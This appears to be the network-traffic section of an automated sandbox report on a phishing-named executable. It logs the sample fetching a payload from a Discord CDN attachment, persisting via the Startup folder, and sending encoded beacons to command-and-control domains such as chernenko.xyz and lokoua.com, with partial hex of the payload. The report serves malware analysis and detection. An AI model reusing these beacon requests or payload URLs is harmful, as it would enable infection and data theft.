                                                        Feb 22, 2023 08:37:23.247437954 CET192.168.2.58.8.8.80x30a0Standard query (0)www.cutgang.netA (IP address)IN (0x0001)false
                                                        Feb 22, 2023 08:37:45.437405109 CET192.168.2.58.8.8.80xe1a4Standard query (0)www.cutgang.netA (IP address)IN (0x0001)false
                                                        Feb 22, 2023 08:38:13.921999931 CET192.168.2.58.8.8.80x23d0Standard query (0)www.cutgang.netA (IP address)IN (0x0001)false
                                                        Feb 22, 2023 08:38:14.574930906 CET192.168.2.58.8.8.80x2a04Standard query (0)www.lokoua.comA (IP address)IN (0x0001)false
                                                        Feb 22, 2023 08:38:34.698437929 CET192.168.2.58.8.8.80x8005Standard query (0)www.justicepeacefamily.comA (IP address)IN (0x0001)false

                                                        DNS Answers

                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                        Feb 22, 2023 08:36:17.799638987 CET8.8.8.8192.168.2.50x9be7No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                                                        Feb 22, 2023 08:36:17.799638987 CET8.8.8.8192.168.2.50x9be7No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                                                        Feb 22, 2023 08:36:17.799638987 CET8.8.8.8192.168.2.50x9be7No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                                                        Feb 22, 2023 08:36:17.799638987 CET8.8.8.8192.168.2.50x9be7No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                                                        Feb 22, 2023 08:36:17.799638987 CET8.8.8.8192.168.2.50x9be7No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                                                        Feb 22, 2023 08:36:36.868711948 CET8.8.8.8192.168.2.50xaf14No error (0)cdn.discordapp.com162.159.129.233A (IP address)IN (0x0001)false
                                                        Feb 22, 2023 08:36:36.868711948 CET8.8.8.8192.168.2.50xaf14No error (0)cdn.discordapp.com162.159.130.233A (IP address)IN (0x0001)false
                                                        Feb 22, 2023 08:36:36.868711948 CET8.8.8.8192.168.2.50xaf14No error (0)cdn.discordapp.com162.159.133.233A (IP address)IN (0x0001)false
                                                        Feb 22, 2023 08:36:36.868711948 CET8.8.8.8192.168.2.50xaf14No error (0)cdn.discordapp.com162.159.134.233A (IP address)IN (0x0001)false
                                                        Feb 22, 2023 08:36:36.868711948 CET8.8.8.8192.168.2.50xaf14No error (0)cdn.discordapp.com162.159.135.233A (IP address)IN (0x0001)false
                                                        Feb 22, 2023 08:37:07.682842970 CET8.8.8.8192.168.2.50xbfd9Server failure (2)www.idszua.comnonenoneA (IP address)IN (0x0001)false
                                                        Feb 22, 2023 08:37:18.164654970 CET8.8.8.8192.168.2.50x7f2cNo error (0)www.chernenko.xyzchernenko.xyzCNAME (Canonical name)IN (0x0001)false
                                                        Feb 22, 2023 08:37:18.164654970 CET8.8.8.8192.168.2.50x7f2cNo error (0)chernenko.xyz20.216.185.237A (IP address)IN (0x0001)false
                                                        Feb 22, 2023 08:37:23.305834055 CET8.8.8.8192.168.2.50x30a0No error (0)www.cutgang.netcutgang.netCNAME (Canonical name)IN (0x0001)false
                                                        Feb 22, 2023 08:37:23.305834055 CET8.8.8.8192.168.2.50x30a0No error (0)cutgang.net194.102.227.30A (IP address)IN (0x0001)false
                                                        Feb 22, 2023 08:37:45.457164049 CET8.8.8.8192.168.2.50xe1a4No error (0)www.cutgang.netcutgang.netCNAME (Canonical name)IN (0x0001)false
                                                        Feb 22, 2023 08:37:45.457164049 CET8.8.8.8192.168.2.50xe1a4No error (0)cutgang.net194.102.227.30A (IP address)IN (0x0001)false
                                                        Feb 22, 2023 08:38:14.027007103 CET8.8.8.8192.168.2.50x23d0No error (0)www.cutgang.netcutgang.netCNAME (Canonical name)IN (0x0001)false
                                                        Feb 22, 2023 08:38:14.027007103 CET8.8.8.8192.168.2.50x23d0No error (0)cutgang.net194.102.227.30A (IP address)IN (0x0001)false
                                                        Feb 22, 2023 08:38:14.610186100 CET8.8.8.8192.168.2.50x2a04No error (0)www.lokoua.comlokoua.comCNAME (Canonical name)IN (0x0001)false
                                                        Feb 22, 2023 08:38:14.610186100 CET8.8.8.8192.168.2.50x2a04No error (0)lokoua.com83.229.19.64A (IP address)IN (0x0001)false
                                                        Feb 22, 2023 08:38:34.728960991 CET8.8.8.8192.168.2.50x8005No error (0)www.justicepeacefamily.comgcdn0.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                        Feb 22, 2023 08:38:34.728960991 CET8.8.8.8192.168.2.50x8005No error (0)gcdn0.wixdns.nettd-ccm-168-233.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                        Feb 22, 2023 08:38:34.728960991 CET8.8.8.8192.168.2.50x8005No error (0)td-ccm-168-233.wixdns.net34.117.168.233A (IP address)IN (0x0001)false

                                                        HTTP Request Dependency Graph

                                                        • cdn.discordapp.com
                                                        • www.chernenko.xyz
                                                        • www.lokoua.com

                                                        HTTP Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        0192.168.2.549704162.159.135.233443C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exe
                                                        TimestampkBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        1192.168.2.549705162.159.129.233443C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Payment INV NO. 230203-1USD.exe
                                                        TimestampkBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        2192.168.2.54971020.216.185.23780C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 22, 2023 08:37:18.202126980 CET955OUTGET /c4mw/?Zq2=eUC8uwYyRxSeyYpSpO2Id78Q83vjRtDBPFOU2IN8r2HfZgJaOQlHD+kqnlWKRqcc2HVOfraHNMQASxEYc4wWxpLoACDs+5Tjdg==&qF=hJ8nKRQ HTTP/1.1
                                                        Host: www.chernenko.xyz
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Feb 22, 2023 08:37:18.229660034 CET956INHTTP/1.1 404 Not Found
                                                        Date: Wed, 22 Feb 2023 07:37:18 GMT
                                                        Server: Apache/2.4.52 (Ubuntu)
                                                        Content-Length: 279
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 63 68 65 72 6e 65 6e 6b 6f 2e 78 79 7a 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.52 (Ubuntu) Server at www.chernenko.xyz Port 80</address></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        3192.168.2.54971683.229.19.6480C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 22, 2023 08:38:14.647630930 CET979OUTPOST /c4mw/ HTTP/1.1
                                                        Host: www.lokoua.com
                                                        Connection: close
                                                        Content-Length: 185
                                                        Cache-Control: no-cache
                                                        Origin: http://www.lokoua.com
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://www.lokoua.com/c4mw/
                                                        Accept-Language: en-US
                                                        Accept-Encoding: gzip, deflate
                                                        Data Raw: 5a 71 32 3d 69 4a 7a 6f 4b 6a 62 55 76 79 47 37 4f 6e 31 51 28 64 41 71 64 70 28 2d 63 31 61 37 63 41 71 4b 68 45 33 6a 73 78 63 45 33 61 44 6a 6f 57 50 50 48 37 41 65 32 71 56 6c 38 32 6a 44 79 68 79 69 31 53 59 70 71 42 7a 57 36 37 31 38 49 72 4e 69 51 43 79 63 30 35 54 54 34 66 31 64 6a 78 5a 33 34 63 55 4d 55 35 31 78 42 65 73 78 77 74 58 4c 49 58 69 70 71 61 50 7a 68 54 5a 33 5a 2d 4d 4e 55 6d 39 75 59 68 37 65 49 61 77 75 4b 64 42 42 6e 75 55 54 79 4f 34 5f 74 74 6a 4c 30 5f 68 33 5a 73 53 67 6a 59 78 61 47 41 76 43 61 4d 38 71 67 41 29 2e 00 00 00 00 00 00 00 00
                                                        Data Ascii: Zq2=iJzoKjbUvyG7On1Q(dAqdp(-c1a7cAqKhE3jsxcE3aDjoWPPH7Ae2qVl82jDyhyi1SYpqBzW6718IrNiQCyc05TT4f1djxZ34cUMU51xBesxwtXLIXipqaPzhTZ3Z-MNUm9uYh7eIawuKdBBnuUTyO4_ttjL0_h3ZsSgjYxaGAvCaM8qgA).
                                                        Feb 22, 2023 08:38:14.714514017 CET979INHTTP/1.1 502 Bad Gateway
                                                        Server: nginx
                                                        Date: Wed, 22 Feb 2023 07:38:14 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        4192.168.2.54971783.229.19.6480C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Feb 22, 2023 08:38:17.201555014 CET980OUTGET /c4mw/?Zq2=vLbIJTjaxi6VX2N+/Nw9CZTUcQ26TCmrvgrmgSoK7uvpnCbJI4wuwNhEzhrO+jOdriENsB2e9KNKFJNLYQWdyqDzg75x9Sdq9w==&qF=hJ8nKRQ HTTP/1.1
                                                        Host: www.lokoua.com
                                                        Connection: close
                                                        Data Raw: 00 00 00 00 00 00 00
                                                        Data Ascii:
                                                        Feb 22, 2023 08:38:17.237879992 CET981INHTTP/1.1 404 Not Found
                                                        Server: nginx
                                                        Date: Wed, 22 Feb 2023 07:38:17 GMT
                                                        Content-Type: text/html
                                                        Transfer-Encoding: chunked
                                                        Connection: close
                                                        Accept-Ranges: bytes
                                                        Data Raw: 35 63 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 66 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 6e 65 2c 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 70 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 0a 3c 48 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 64 6f 63 75 6d 65 6e 74 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 48 31 3e 4e 6f 6e 20 54 72 6f 75 76 c3 a9 3c 2f 48 31 3e 0a 4c 65 20 64 6f 63 75 6d 65 6e 74 20 64 65 6d 61 6e 64 c3 a9 20 6e 27 61 20 70 61 73 20 c3 a9 74 c3 a9 20 74 72 6f 75 76 c3 a9 20 73 75 72 20 63 65 20 73 65 72 76 65 75 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 48 31 3e 4e 6f 20 45 6e 63 6f 6e 74 72 61 64 6f 3c 2f 48 31 3e 0a 45 6c 20 64 6f 63 75 6d 65 6e 74 6f 20 73 6f 6c 69 63 69 74 61 64 6f 20 6e 6f 20 73 65 20 65 6e 63 6f 6e 74 72 c3 b3 20 65 6e 20 65 73 74 65 20 73 65 72 76 69 64 6f 72 2e 0a 3c 50 3e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 0a 57 65 62 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6c 6f 6b 6f 75 61 2e 63 6f 6d 20 20 7c 20 20 50 6f 77 65 72 65 64 20 62 79 20 77 77 77 2e 6c 77 73 2e 66 72 0a 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 4c 3e 0a 0a 3c 21 2d 2d 0a 20 20 20 2d 20 55 6e 66 6f 72 74 75 6e 61 74 65 6c 79 2c 20 4d 69 63 72 6f 73 6f 66 74 20 68 61 73 20 61 64 64 65 64 20 61 20 63 6c 65 76 65 72 20 6e 65 77 0a 20 20 20 2d 20 22 66 65 61 74 75 72 65 22 20 74 6f 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 2e 20 49 66 20 74 68 65 20 74 65 78 74 20 6f 66 0a 20 20 20 2d 20 61 6e 20 65 72 72 6f 72 27 73 20 6d 65 73 73 61 67 65 20 69 73 20 22 74 6f 6f 20 73 6d 61 6c 6c 22 2c 20 73 70 65 63 69 66 69 63 61 6c 6c 79 0a 20 20 20 2d 20 6c 65 73 73 20 74 68 61 6e 20 35 31 32 20 62 79 74 65 73 2c 20 49 6e 74 65 72 6e 65 74 20 45 78 70 6c 6f 72 65 72 20 72 65 74 75 72 6e 73 0a 20 20 20 2d 20 69 74 73 20 6f 77 6e 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 2e 20 59 6f 75 20 63 61 6e 20 74 75 72 6e 20 74 68 61 74 20 6f 66 66 2c 0a 20 20 20 2d 20 62 75 74 20 69 74 27 73 20 70 72 65 74 74 79 20 74 72 69 63 6b 79 20 74 6f 20 66 69 6e 64 20 73 77 69 74 63 68 20 63 61 6c 6c 65 64 0a 20 20 20 2d 20 22 73 6d 61 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 22 2e 20 54 68 61 74 20 6d 65 61 6e 73 2c 20 6f 66 20 63 6f 75 72 73 65 2c 0a 20 20 20 2d 20 74 68 61 74
                                                        Data Ascii: 5ce<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html lang="fr"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><meta name="robots" content="none,noindex,nofollow"><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"><TITLE>404 Not Found</TITLE></HEAD><BODY><H1>Not Found</H1>The requested document was not found on this server.<P><HR><H1>Non Trouv</H1>Le document demand n'a pas t trouv sur ce serveur.<P><HR><H1>No Encontrado</H1>El documento solicitado no se encontr en este servidor.<P><HR><ADDRESS>Web Server at www.lokoua.com | Powered by www.lws.fr</ADDRESS></BODY></HTML>... - Unfortunately, Microsoft has added a clever new - "feature" to Internet Explorer. If the text of - an error's message is "too small", specifically - less than 512 bytes, Internet Explorer returns - its own error message. You can turn that off, - but it's pretty tricky to find switch called - "smart error messages". That means, of course, - that
                                                        Feb 22, 2023 08:38:17.237912893 CET982INData Raw: 20 73 68 6f 72 74 20 65 72 72 6f 72 20 6d 65 73 73 61 67 65 73 20 61 72 65 20 63 65 6e 73 6f 72 65 64 20 62 79 20 64 65 66 61 75 6c 74 2e 0a 20 20 20 2d 20 49 49 53 20 61 6c 77 61 79 73 20 72 65 74 75 72 6e 73 20 65 72 72 6f 72 20 6d 65 73 73 61
                                                        Data Ascii: short error messages are censored by default. - IIS always returns error messages that are long - enough to make Internet Explorer happy. The - workaround is pretty simple: pad the error - message with a big comment like this to p
                                                        Feb 22, 2023 08:38:17.237953901 CET982INData Raw: 30 0d 0a 0d 0a
                                                        Data Ascii: 0


                                                        HTTPS Proxied Packets

                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        0192.168.2.549704162.159.135.233443C:\Users\user\Desktop\Payment INV NO. 230203-1USD.exe
                                                        TimestampkBytes transferredDirectionData
                                                        2023-02-22 07:36:18 UTC0OUTGET /attachments/1072614287295660156/1076965214899146822/702 HTTP/1.1
                                                        Host: cdn.discordapp.com
                                                        Connection: Keep-Alive
                                                        2023-02-22 07:36:18 UTC0INHTTP/1.1 200 OK
                                                        Date: Wed, 22 Feb 2023 07:36:18 GMT
                                                        Content-Type: application/octet-stream
                                                        Content-Length: 448000
                                                        Connection: close
                                                        CF-Ray: 79d60cca48a92c3b-FRA
                                                        Accept-Ranges: bytes
                                                        Cache-Control: public, max-age=31536000
                                                        Content-Disposition: attachment;%20filename="702"
                                                        ETag: "c70f9ed1fad97dc6f835a513035e4f76"
                                                        Expires: Thu, 22 Feb 2024 07:36:18 GMT
                                                        Last-Modified: Sun, 19 Feb 2023 20:35:16 GMT
                                                        Vary: Accept-Encoding
                                                        CF-Cache-Status: MISS
                                                        Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                        x-goog-generation: 1676838916362263
                                                        x-goog-hash: crc32c=fBnM8Q==
                                                        x-goog-hash: md5=xw+e0frZfcb4NaUTA15Pdg==
                                                        x-goog-metageneration: 1
                                                        x-goog-storage-class: STANDARD
                                                        x-goog-stored-content-encoding: identity
                                                        x-goog-stored-content-length: 448000
                                                        X-GUploader-UploadID: ADPycduoRpF5ScvpYifAKkHP-Fb-FhlBhmlgy0P359ffz-yPmQn3KDpk-H5EruV_8UPlbheQh77qQDVUCc-lFpJsjjJI
                                                        X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                        Set-Cookie: __cf_bm=u.oYss1AQFPHoLpO22pk0tM_Srr3UhASTfSGNpwQX4Q-1677051378-0-Aa39ueHIXw1og4tRns3TcdLwr+ntAr1x2n4Lsyb36Q6Zu8985jwpCSVo09j9CeJd1RHM99FmzRz77ab6dwNV3sQ=; path=/; expires=Wed, 22-Feb-23 08:06:18 GMT; domain=.discordapp.com; HttpOnly; Secure
                                                        2023-02-22 07:36:18 UTC1INData Raw: 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 43 65 5a 66 68 6c 79 64 47 7a 43 4e 6d 68 75 59 4a 35 62 47 61 4e 66 49 77 25 32 42 5a 49 53 52 6c 64 30 79 49 45 75 4a 75 73 54 25 32 42 33 39 79 4f 71 4c 4a 50 38 37 59 66 32 47 25 32 46 4c 57 55 46 79 62 4a 54 30 74 42 6a 25 32 42 33 55 66 42 6a 67 77 25 32 46 43 6e 51 31 68 55 6c 65 64 50 42 71 52 66 32 57 41 59 41 67 42 75 36 6c 4b 34 47 79 44 62 34 42 7a 59 69 46 4c 77 41 63 78 77 42 69 69 4e 52 30 71 25 32 46 69 78 68 57 7a 41 25 33 44 25 33 44 22 7d 5d 2c 22 67 72 6f 75 70 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78
                                                        Data Ascii: Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CeZfhlydGzCNmhuYJ5bGaNfIw%2BZISRld0yIEuJusT%2B39yOqLJP87Yf2G%2FLWUFybJT0tBj%2B3UfBjgw%2FCnQ1hUledPBqRf2WAYAgBu6lK4GyDb4BzYiFLwAcxwBiiNR0q%2FixhWzA%3D%3D"}],"group":"cf-nel","max
                                                        2023-02-22 07:36:18 UTC1INData Raw: 0b 18 4e be c1 be be be c2 be be be bd bd be be 76 be be be be be be be fe be be be be be be be be be be be be be be be be be be be be be be be be be be be be be be be be be be be 3e be be be cc dd 78 cc be 72 c7 8b df 76 bf 0a 8b df 12 26 27 31 de 2e 30 2d 25 30 1f 2b de 21 1f 2c 2c 2d 32 de 20 23 de 30 33 2c de 27 2c de 02 0d 11 de 2b 2d 22 23 ec cb cb c8 e2 be be be be be be be 0e 03 be be 0a bf c1 be df 3b b0 21 be be be be be be be be 9e be cc df c9 bf c6 be be 8c c4 be be c4 be be be be be be ec ab c4 be be de be be be be c5 be be be fe be be de be be be c0 be be c2 be be be be be be be c2 be be be be be be be be fe c5 be be c0 be be be be be be c1 be fe 43 be be ce be be ce be be be be ce be be ce be be be be be be ce be be be be be be be be be be
                                                        Data Ascii: Nv>xrv&'1.0-%0+!,,-2 #03,',+-"#;!C
                                                        2023-02-22 07:36:18 UTC2INData Raw: be be be d0 c1 e6 c8 be be c8 d1 be de c8 be be be 3c ff bf be c2 f8 49 bc bd bd e4 f6 3f bc bd bd f6 6d bd bd bd f6 be be be be d4 d1 c2 de c7 be be be bc cc c8 be f6 24 bc bd bd cf be 33 bf be be bf e6 c9 be be c8 cf bf bc c0 d1 c6 f6 7a bc bd bd cf bf 2a e1 ba de 0c 0d 6d 21 d2 77 bc bf d1 ca f6 94 bc bd bd cf bf de 3a 96 c9 be 16 d1 bf f6 9a bd bd bd d4 d1 c2 de c5 be be be 3c 38 bf be c2 f7 db bc bd bd e4 f6 d1 bc bd bd cf bf cf bf de 80 7b c3 be 19 de 80 7b c3 be 18 cf bf 1f 16 d1 bf f6 f8 bc bd bd f6 72 bc bd bd de c4 be be be f6 ab bb bd bd dd 1e d1 bf f6 f0 be be be cf c3 32 bf be be d9 cf c4 32 d7 be be bf d4 d6 2d ca be be c8 52 d1 c5 de bf be be be 3c 32 bf be c2 f8 7b bb bd bd e4 de bf be be be f6 70 bb bd bd d6 4b c8 be be bf e3 d4 cf bf 5c
                                                        Data Ascii: <I?m$3z*m!w:<8{{r22-R<2{pK\
                                                        2023-02-22 07:36:18 UTC4INData Raw: bd bd e8 be be d1 ee c4 be 7c be be be c4 be be cf f6 e6 be be be bc ca bf be 03 c0 be be be e2 be be be 1e be be be f6 dd be be be cf be 32 e4 be be bf e6 dd be be c4 e4 f6 ca be be be 31 d8 be be c8 d1 be f6 1d be be be e8 cf be 33 e4 be be bf d9 4b bf be be bf e3 d4 e6 2a bf be c4 60 e3 d5 c0 60 e3 d6 e6 2b bf be c4 60 e3 d7 c1 60 e3 d8 e6 2c bf be c4 60 e6 d9 be be c8 2d da be be c8 f6 63 bd bd bd cf be 32 e4 be be bf d5 2d db be be c8 de be be be be 3c 18 bf be c2 f8 35 bd bd bd e4 f6 2b bd bd bd cf be 33 e4 be be bf e6 29 bf be c4 e6 dc be be c4 de bf be be be 3c ff bf be c2 f8 0f bd bd bd e4 f6 05 bd bd bd be be d1 ee c3 be 07 bf be be c5 be be cf de c1 be be be bc cc c2 be f6 be be be be bc ca c2 be 03 c2 be be be bf bf be be 3f be be be e0 be be
                                                        Data Ascii: |213K*``+``,`-c2-<5+3)<?
                                                        2023-02-22 07:36:18 UTC5INData Raw: be c4 60 e3 d5 e6 03 be be c4 e6 32 bf be c4 d5 e1 17 27 10 c8 b2 01 95 fe d5 e6 f4 be be c4 60 e3 d6 e6 33 bf be c4 e6 04 be be c4 d5 e1 17 27 10 c8 b2 01 95 fe d5 e6 f4 be be c4 60 e3 d7 e6 35 bf be c4 e6 34 bf be c4 d5 e1 17 27 10 c8 b2 01 95 fe d5 e6 f4 be be c4 60 d1 be f6 be be be be cf be 32 c1 be be d9 e8 be be be d1 ee c1 be d2 be be be c7 be be cf c0 e6 05 be be c4 4c d4 bc c1 d1 be f6 be be be be cf be e8 d1 ee c0 be d3 be be be c7 be be cf f6 c1 be be be cf be e8 c0 e6 d7 be be c8 d1 be f6 ae bd bd bd be be be d1 ee c2 be 2c be be be c8 be be cf f6 f0 be be be bc ca be be 03 bf be be be c3 be be be f6 be be be be cf bf 33 c0 be be d9 e8 cf c0 32 c0 be be d9 e6 2d bf be c4 e6 06 be be c4 d1 c0 f6 d7 be be be dd e9 4b d1 be be bf e3 8e 0e be be
                                                        Data Ascii: `2'`3'`54'`2L,32-K
                                                        2023-02-22 07:36:18 UTC6INData Raw: d5 e6 f4 be be c4 e6 f1 be be c4 d1 c3 f6 14 bb bd bd c2 c1 e6 f9 bf be c4 f6 3d bd bd bd cf cd f7 08 bc bd bd f6 c6 bd bd bd c0 c2 c1 e6 f8 be be c4 f6 69 bd bd bd cf c6 d1 c7 de c3 be be be 3c 09 bf be c2 f7 89 ba bd bd e4 de bf be be be f6 7e ba bd bd e8 cf ca f7 0d bd bd bd de ca be be be f6 6c ba bd bd e6 09 be be c4 d1 be de c6 be be be f6 5b ba bd bd c0 c2 c1 e6 f8 be be c4 f6 8e bd bd bd be be d1 ee c6 be 41 bf be be c7 be be cf e6 12 be be c4 de a6 c1 be be e6 4c be be c4 e6 f1 be be c4 e6 13 be be c4 de a6 c1 be be e6 4c be be c4 e6 0b be be c4 1e e6 14 be be c4 de a6 c1 be be e6 4c be be c4 e6 f1 be be c4 1e e6 47 bf be c4 de a6 c1 be be e6 4c be be c4 e6 0b be be c4 1e e6 15 be be c4 de a6 c1 be be e6 4c be be c4 e6 0b be be c4 1e e6 16 be be
                                                        Data Ascii: =i<~l[ALLLGLL
                                                        2023-02-22 07:36:18 UTC8INData Raw: c4 d1 c0 de bf be be be 3c fe bf be c2 f8 59 bc bd bd e4 de bf be be be f6 4e bc bd bd cf c5 32 fb be be bf 2d fc be be c8 d1 c6 f6 8a bd bd bd cf c7 f7 cd be be be f6 76 bd bd bd 9b e8 be be be f6 be be be be d4 d1 c4 f6 be be be be 9b d6 be be be e4 f6 be be be be d4 d1 c4 f6 be be be be 9b c3 be be be f6 be be be be cf c4 e8 ff f2 be be c0 be be be f4 be be be 46 be be be 7c be be be 0d be be be be be be be be be be be bf be be be 7e bf be be 7f bf be be d1 be be be ca be be bf ec c0 e6 fd be be c8 4c d4 bc c1 e8 70 f6 bf be be be e8 3c c6 be be c2 db e6 ef be be c8 e6 ff be be c4 c0 e6 3d bf be c4 e6 f2 be be c8 d5 e6 29 be be c4 f6 97 bd bd bd be be be d9 ee c2 be 13 c1 be be ce be be cf de c0 be be be bc cc c6 be f6 be be be be bc ca c6 be 03 c1 be
                                                        Data Ascii: <YN2-vF|~Lp<=)
